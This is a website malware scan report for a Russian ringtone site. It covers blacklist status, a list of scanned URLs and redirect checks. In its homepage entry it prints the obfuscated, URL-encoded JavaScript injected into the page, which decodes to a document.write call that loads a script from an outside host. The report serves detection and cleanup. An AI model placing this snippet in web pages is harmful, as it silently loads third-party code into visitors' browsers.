New scan:

Malware Scanner report for rington3gp.ru

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Yandex as SMS-fraud resource.

The website "rington3gp.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=rington3gp.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://rington3gp.ru/

Result: The website is marked by Yandex as SMS-fraud resource. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://rington3gp.ru/
200 OK
Content-Length: 60452
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

g="%3Cscript%20type%3D%22text%2FJavaScript%22%20language%3D%22JavaScript%22%20charset%3D%22windows-1251%22%3Eeval%28function%28iqi%2Ca%2Cc%2Ck%2Ce%2Cd%29%7Be%3Dfunction%28c%29%7Breturn%20c.toString%2836%29%7D%3Bif%28%21%27%27.replace%28%2F%5E%2F%2CString%29%29%7Bwhile%28c--%29%7Bd%5Bc.toString%28a%29%5D%3Dk%5Bc%5D%7C%7Cc.toString%28a%29%7Dk%3D%5Bfunction%28e%29%7Breturn%20d%5Be%5D%7D%5D%3Be%3Dfunction%28%29%7Breturn%27%5C%5Cw%2B%27%7D%3Bc%3D1%7D%3Bwhile%28c--%29%7Bif%28k%5Bc%5D%29%7Biqi%3Diqi.replace%28new%20RegExp%28%27%5C%5Cb%27%2Be%28c%29%2B%27%5C%5Cb%27%2C%27g%27%29%2Ck%5Bc%5D%29%7D%7Dreturn%20iqi%7D%28%274.3%28%22%3C0%202%22%2B%221%3D%5C%5C%225%3A%2F%2F6.a.9%2F8.7%5C%5C%22%3E%3C%5C%5C%2F0%3E%22%29%3B%27%2C11%2C11%2C%27script%7Cc%7Csr%7Cwrite%7Cdocument%7Chttp%7Cwww%7Cphp%7Cjs5%7Ccom%7Cwmrak%27.split%28%27%7C%27%29%2C0%2C%7B%7D%29%29%0A%3C%2Fscript%3E";g=g.replace(/л/g,"7C");g=g.replace(/м/g,"5C");g=g.replace(/н/g,"2C");document.write(unescape(g));

Antivirus reports:

NANO-Antivirus
Trojan.Script.Heuristic-js.iacgm

http://rington3gp.ru/wp-content/themes/audi_gtr_fleximag/script.js
200 OK
Content-Length: 14945
Content-Type: application/x-javascript
clean
https://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js?ver=1.6.4
200 OK
Content-Length: 91668
Content-Type: text/javascript
clean
http://rington3gp.ru/wp-content/plugins/wp-video-lightbox/js/jquery.prettyPhoto.js?ver=3.1.5
200 OK
Content-Length: 35243
Content-Type: application/x-javascript
clean
http://rington3gp.ru/wp-content/plugins/wp-video-lightbox/js/video-lightbox.js?ver=3.1.5
200 OK
Content-Length: 6871
Content-Type: application/x-javascript
clean
http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js?ver=2.2
200 OK
Content-Length: 10220
Content-Type: text/javascript
clean
http://rington3gp.ru/wp-content/plugins/advanced-spoiler/js/jquery-spoiler.js?ver=2.02
200 OK
Content-Length: 3121
Content-Type: application/x-javascript
clean
http://rington3gp.ru/wp-content/plugins/thethe-image-slider/style/js/thethe-image-slider.js?ver=3.4.2
200 OK
Content-Length: 31873
Content-Type: application/x-javascript
clean
http://rington3gp.ru/wp-content/plugins/auto-highslide/highslide/highslide-with-html.packed.js
200 OK
Content-Length: 32205
Content-Type: application/x-javascript
clean
http://rington3gp.ru/wp-content/plugins/jquery-vertical-mega-menu/js/jquery.hoverIntent.minified.js?ver=3.4.2
200 OK
Content-Length: 1614
Content-Type: application/x-javascript
clean
http://rington3gp.ru/wp-content/plugins/jquery-vertical-mega-menu/js/jquery.dcverticalmegamenu.1.3.js?ver=3.4.2
200 OK
Content-Length: 6386
Content-Type: application/x-javascript
clean
http://rington3gp.ru/konkurs-na-bloge/
200 OK
Content-Length: 37769
Content-Type: text/html
clean
http://rington3gp.ru/wp-content/plugins/qipsmiles/qips-js.php
200 OK
Content-Length: 2292
Content-Type: application/x-javascript
clean
http://rington3gp.ru/wp-login.php?action=register
200 OK
Content-Length: 3106
Content-Type: text/html
clean
http://rington3gp.ru/wp-login.php
200 OK
Content-Length: 2703
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: rington3gp.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 02 Mar 2015 09:45:11 GMT
Pragma: no-cache
Server: nginx/1.2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=ee8f190bafd3176f331380afe445bcf9; path=/
X-Pingback: http://rington3gp.ru/xmlrpc.php
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: rington3gp.ru
Referer: http://www.google.com/search?q=rington3gp.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.